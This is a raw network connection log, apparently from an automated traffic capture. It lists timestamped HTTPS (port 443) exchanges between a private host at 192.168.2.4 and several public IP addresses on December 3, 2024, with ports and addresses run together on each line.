                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.497725010 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.497725010 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.497735977 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.497776031 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.540662050 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.781286001 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.781708002 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.781722069 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.782037020 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.782485962 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.782485962 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.782542944 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.836433887 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.963195086 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.964092970 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.964135885 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.964184046 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.964193106 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.965120077 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.965145111 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.965148926 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.965675116 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.966240883 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.975058079 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.975415945 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.975419998 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.984067917 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.984688997 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:49.984693050 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.042597055 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.088290930 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.134043932 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.134727955 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.134769917 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.135755062 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.136110067 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.136110067 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.136177063 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.136212111 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.136392117 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.136396885 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.169280052 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.169548035 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.169591904 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.169601917 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.170175076 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.178133965 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.183300972 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.183317900 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.186757088 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.186959028 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.186985970 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.186991930 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.187448025 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.195146084 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.202686071 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.203054905 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.203058958 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.210927010 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.211355925 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.211359024 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.219223976 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.219619989 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.219623089 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.229273081 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.235132933 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.235394001 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.235419035 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.235423088 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.235649109 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.242201090 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.248775959 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.248991013 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.249034882 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.249038935 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.249526024 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.255784035 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.261338949 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.261384010 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.261423111 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.261831999 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.261831999 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.268083096 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.268475056 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.268503904 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.268583059 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.268594027 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.269488096 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.269493103 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.276032925 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.276287079 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.283642054 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.283648014 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.284220934 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.284482002 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.293190956 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.295703888 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.295708895 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.351764917 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.389070988 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.425313950 CET49757443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.425347090 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.425411940 CET49757443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.425623894 CET49757443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.425637007 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.428898096 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.428905010 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.478666067 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.481451035 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.485640049 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.485714912 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.485721111 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.493660927 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.493721962 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.493726015 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.502542019 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.502623081 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.502628088 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.509716034 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.509778023 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.509840012 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.510040998 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.510056973 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.518270969 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.518366098 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.518371105 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.526245117 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.526309013 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.526314020 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.534193993 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.534277916 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.534282923 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.540436983 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.540494919 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.540499926 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.547056913 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.547121048 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.547126055 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.553915977 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.553968906 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.553975105 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.560523987 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.560600996 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.560606003 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.566128016 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.566179037 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.566183090 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.570183039 CET49751443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.570199013 CET44349751104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.572343111 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.572417021 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.572428942 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.572469950 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.572725058 CET49752443192.168.2.4104.17.24.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.572736025 CET44349752104.17.24.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.581898928 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.593277931 CET4434975352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.593375921 CET49753443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.596010923 CET49753443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.596014023 CET4434975352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.596411943 CET4434975352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.632139921 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.648124933 CET49753443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.702862978 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.702871084 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.702905893 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.702920914 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.702944994 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.702950954 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.702984095 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.703011990 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.703057051 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.827609062 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.827617884 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.827650070 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.827682972 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.827685118 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.827702999 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.827717066 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.827744961 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.985891104 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.985902071 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.985934973 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.985984087 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.986010075 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.986025095 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.986043930 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.017301083 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.017314911 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.017374039 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.017386913 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.017422915 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.046056986 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.046072006 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.046117067 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.046125889 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.046153069 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.046184063 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.061300993 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.061353922 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.061363935 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.061403990 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.061700106 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.061716080 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.794024944 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.794333935 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.794372082 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.795275927 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.795356035 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.795660973 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.795717955 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.795803070 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.795811892 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.803356886 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.803515911 CET49757443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.803545952 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.805012941 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.805069923 CET49757443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.805310011 CET49757443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.805387020 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.805413008 CET49757443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.838814020 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.847332954 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.854199886 CET49757443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.854206085 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:51.901850939 CET49757443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.251379967 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.252860069 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.252885103 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.252924919 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.252948999 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.253290892 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.254061937 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.255340099 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.255387068 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.255395889 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.259732008 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.259784937 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.259793997 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.276285887 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.276348114 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.276355028 CET44349758104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.277337074 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.278057098 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.278105974 CET49757443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.278115034 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.279148102 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.279191971 CET49757443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.279197931 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.287261963 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.289642096 CET49757443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.289649010 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.296802998 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.297640085 CET49757443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.297646046 CET44349757104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.305666924 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.305705070 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.305768013 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.305980921 CET49760443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.305996895 CET44349760104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.329024076 CET49758443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.345128059 CET49757443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:52.397259951 CET44349757104.18.95.41192.168.2.4
